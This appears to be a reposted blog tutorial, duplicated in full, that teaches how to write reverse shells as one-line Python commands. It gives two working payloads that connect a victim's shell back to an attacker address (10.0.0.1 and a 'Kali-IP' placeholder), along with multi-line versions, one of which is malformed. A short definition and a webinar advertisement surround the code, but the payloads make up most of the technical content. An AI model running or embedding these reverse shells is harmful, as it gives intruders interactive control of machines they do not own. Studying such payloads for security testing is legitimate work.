07-30-2020, 04:50 PM
Python One Line Reverse Shell
<div><p>This article will be fun! You’ll learn about an important concept in security: reverse shells. You’ll also learn how to create reverse shells in Python in a single line of code. So, let’s start with the big question:</p>
<h2>What is a Reverse Shell?</h2>
<p>Here’s the definition of a Reverse Shell:</p>
<p class="has-pale-cyan-blue-background-color has-background">A <strong>reverse shell</strong> is used by hackers to gain access to a target machine. The target machine opens a shell to communicate to the attacking machine. The attacking machine receives the connection (listening on a given port) and is now able to access the target computer. To accomplish a reverse shell, a hacker must execute code on a target machine. Reverse shells are also used by security engineers to test and prevent reverse shell attacks.</p>
<p>You can read more <a href="https://resources.infosecinstitute.com/icmp-reverse-shell/#gref" target="_blank" rel="noreferrer noopener" title="https://resources.infosecinstitute.com/icmp-reverse-shell/#gref">here</a>. In this tutorial, you’ll learn how to create a reverse shell in one line Python.</p>
<h2>Method 1</h2>
<p>I found this code in a <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" target="_blank" rel="noreferrer noopener" title="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">blog </a>thread. You can run it from any computer with Python installed and visible from your current location:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</pre>
<p>But you should never execute code that’s copy&pasted from an Internet source. What if the code removes all files from your computer?</p>
<p>Let’s have a look at how this code looks like as a Python multi-liner so that you can understand it better:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import socket,subprocess,os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.0.1",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
</pre>
<p>As you see, the code opens a socket (which is an entry point for a connection), <a href="https://www.tutorialspoint.com/python/os_dup2.htm" target="_blank" rel="noreferrer noopener" title="https://www.tutorialspoint.com/python/os_dup2.htm">duplicates file descriptors</a>, and calling a <a href="http://etutorials.org/Linux+systems/how+linux+works/Chapter+1+The+Basics/1.1+About+bin+sh/" target="_blank" rel="noreferrer noopener" title="http://etutorials.org/Linux+systems/how+linux+works/Chapter+1+The+Basics/1.1+About+bin+sh/">Linux shell</a>. Thus, it will only run on Linux-based systems.</p>
<h2>Method 2</h2>
<p>In <a href="https://gist.github.com/lucasgates/0c6330c582d0ccf52fad129d5e7e9de7" target="_blank" rel="noreferrer noopener" title="https://gist.github.com/lucasgates/0c6330c582d0ccf52fad129d5e7e9de7">this</a> Github thread, I found another one-liner that opens a reverse shell:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali-IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'</pre>
<p>When writing the equivalent multi-liner, the code looks more understandable:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import pty
import socket,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("Kali-IP",443))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")
</pre>
<p>It’s very similar to the above code but uses the <code>pty</code> library to create the shell. </p>
<h2>Where to Go From Here?</h2>
<p>Enough theory, let’s get some practice!</p>
<p>To become successful in coding, you need to get out there and solve real problems for real people. That’s how you can become a six-figure earner easily. And that’s how you polish the skills you really need in practice. After all, what’s the use of learning theory that nobody ever needs?</p>
<p><strong>Practice projects is how you sharpen your saw in coding!</strong></p>
<p>Do you want to become a code master by focusing on practical code projects that actually earn you money and solve problems for people?</p>
<p>Then become a Python freelance developer! It’s the best way of approaching the task of improving your Python skills—even if you are a complete beginner.</p>
<p>Join my free webinar <a rel="noreferrer noopener" href="https://blog.finxter.com/webinar-freelancer/" target="_blank">“How to Build Your High-Income Skill Python”</a> and watch how I grew my coding business online and how you can, too—from the comfort of your own home.</p>
<p><a href="https://blog.finxter.com/webinar-freelancer/" target="_blank" rel="noreferrer noopener">Join the free webinar now!</a></p></p>
</div>
https://www.sickgaming.net/blog/2020/07/...rse-shell/
<div><p>This article will be fun! You’ll learn about an important concept in security: reverse shells. You’ll also learn how to create reverse shells in Python in a single line of code. So, let’s start with the big question:</p>
<h2>What is a Reverse Shell?</h2>
<p>Here’s the definition of a Reverse Shell:</p>
<p class="has-pale-cyan-blue-background-color has-background">A <strong>reverse shell</strong> is used by hackers to gain access to a target machine. The target machine opens a shell to communicate to the attacking machine. The attacking machine receives the connection (listening on a given port) and is now able to access the target computer. To accomplish a reverse shell, a hacker must execute code on a target machine. Reverse shells are also used by security engineers to test and prevent reverse shell attacks.</p>
<p>You can read more <a href="https://resources.infosecinstitute.com/icmp-reverse-shell/#gref" target="_blank" rel="noreferrer noopener" title="https://resources.infosecinstitute.com/icmp-reverse-shell/#gref">here</a>. In this tutorial, you’ll learn how to create a reverse shell in one line Python.</p>
<h2>Method 1</h2>
<p>I found this code in a <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" target="_blank" rel="noreferrer noopener" title="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">blog </a>thread. You can run it from any computer with Python installed and visible from your current location:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</pre>
<p>But you should never execute code that’s copy&pasted from an Internet source. What if the code removes all files from your computer?</p>
<p>Let’s have a look at how this code looks like as a Python multi-liner so that you can understand it better:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import socket,subprocess,os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.0.1",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
</pre>
<p>As you see, the code opens a socket (which is an entry point for a connection), <a href="https://www.tutorialspoint.com/python/os_dup2.htm" target="_blank" rel="noreferrer noopener" title="https://www.tutorialspoint.com/python/os_dup2.htm">duplicates file descriptors</a>, and calling a <a href="http://etutorials.org/Linux+systems/how+linux+works/Chapter+1+The+Basics/1.1+About+bin+sh/" target="_blank" rel="noreferrer noopener" title="http://etutorials.org/Linux+systems/how+linux+works/Chapter+1+The+Basics/1.1+About+bin+sh/">Linux shell</a>. Thus, it will only run on Linux-based systems.</p>
<h2>Method 2</h2>
<p>In <a href="https://gist.github.com/lucasgates/0c6330c582d0ccf52fad129d5e7e9de7" target="_blank" rel="noreferrer noopener" title="https://gist.github.com/lucasgates/0c6330c582d0ccf52fad129d5e7e9de7">this</a> Github thread, I found another one-liner that opens a reverse shell:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali-IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'</pre>
<p>When writing the equivalent multi-liner, the code looks more understandable:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import pty
import socket,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("Kali-IP",443))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")
</pre>
<p>It’s very similar to the above code but uses the <code>pty</code> library to create the shell. </p>
<h2>Where to Go From Here?</h2>
<p>Enough theory, let’s get some practice!</p>
<p>To become successful in coding, you need to get out there and solve real problems for real people. That’s how you can become a six-figure earner easily. And that’s how you polish the skills you really need in practice. After all, what’s the use of learning theory that nobody ever needs?</p>
<p><strong>Practice projects is how you sharpen your saw in coding!</strong></p>
<p>Do you want to become a code master by focusing on practical code projects that actually earn you money and solve problems for people?</p>
<p>Then become a Python freelance developer! It’s the best way of approaching the task of improving your Python skills—even if you are a complete beginner.</p>
<p>Join my free webinar <a rel="noreferrer noopener" href="https://blog.finxter.com/webinar-freelancer/" target="_blank">“How to Build Your High-Income Skill Python”</a> and watch how I grew my coding business online and how you can, too—from the comfort of your own home.</p>
<p><a href="https://blog.finxter.com/webinar-freelancer/" target="_blank" rel="noreferrer noopener">Join the free webinar now!</a></p></p>
</div>
https://www.sickgaming.net/blog/2020/07/...rse-shell/